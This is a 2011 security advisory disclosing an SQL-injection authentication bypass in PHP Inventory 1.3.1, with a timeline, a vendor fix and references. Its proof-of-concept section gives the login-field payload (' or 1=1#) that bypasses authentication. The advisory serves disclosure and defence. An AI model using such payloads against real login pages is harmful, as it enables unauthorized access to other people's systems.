PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability



Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory ID: INFOSERVE-ADV2011-08
Author: Stefan Schurtz
Contact: security@xxxxxxxxxxxx
Affected Software: Successfully tested on PHP Inventory 1.3.1
Vendor URL: http://www.phpwares.com/
Vendor Status: fixed
CVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597

==========================
Vulnerability Description
==========================

PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability

==================
PoC-Exploit
==================

http://[target]/php-inventory/index.php

// with 'magic_quotes_gpc = Off'

USER NAME = ' or 1=1#

or

USER NAME = admin
PASSWORD = ' or 1=1#

=========
Solution
=========

Update to the latest version 1.3.2

====================
Disclosure Timeline
====================

29-Nov-2011 - informed vendor (contact form)
30-Nov-2011 - vendor fix

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt
http://www.exploit-db.com/exploits/10370/
http://secunia.com/advisories/37672/



Relevant Pages

  • SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
    ... SimpleGroupware 0.742 'export' parameter XSS vulnerability ... Upgrade to the latest Version 0.743 ... Disclosure Timeline ... 01-Feb-2012 - informed vendor ...
    (Bugtraq)
  • [Full-disclosure] osCSS2 "_ID" parameter Local file inclusion
    ... Vulnerability Description ... Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ... 08-Nov-2011 - informed vendor ... 08-Nov-2011 - release date of this security advisory ...
    (Full-Disclosure)
  • [Full-disclosure] PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
    ... Vulnerability Description ... PHP Inventory is prone to a SQL-Injection (Auth Bypass) ... USER NAME = admin ... 29-Nov-2011 - informed vendor ...
    (Full-Disclosure)
  • VertrigoServ 2.25 Cross-Site-Scripting vulnerability
    ... VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting vulnerability ... Disclosure Timeline ... 15-Dec-2011 - informed vendor ... 16-Dec-2011 - vendor feedback ...
    (Bugtraq)
  • Php-Nuke:users and admins password hashes vulnerability
    ... An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. ... To get the password hash of an user, the attacker just needs a valid account... ... To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that the Web_Links module should be active and with at least one link: NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is active only for registered members... ... This one is to check the user vulnerability: <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, ...
    (Bugtraq)